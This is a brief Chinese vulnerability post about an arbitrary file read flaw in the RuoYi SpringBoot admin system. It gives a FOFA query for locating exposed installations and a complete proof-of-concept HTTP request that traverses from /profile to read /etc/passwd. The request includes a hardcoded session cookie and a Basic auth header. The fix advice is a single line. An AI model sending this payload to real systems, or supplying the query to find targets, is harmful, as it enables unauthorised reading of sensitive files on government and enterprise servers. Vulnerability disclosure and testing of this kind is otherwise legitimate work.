Nx01 产品简介
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
Nx02 漏洞描述
若依系统后台存在任意文件读取漏洞,攻击者利用此漏洞获取敏感信息。
Nx03 产品主页
fofa-query: app="RuoYi"
Nx04 漏洞复现
POC:
GET /common/download/resource?resource=/profile/../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=761c2858-f5e3-42e0-a087-dcd9e2880759
Authorization: Basic emthcTp6a2Fx
Nx05 修复建议
建议联系软件厂商进行处理。
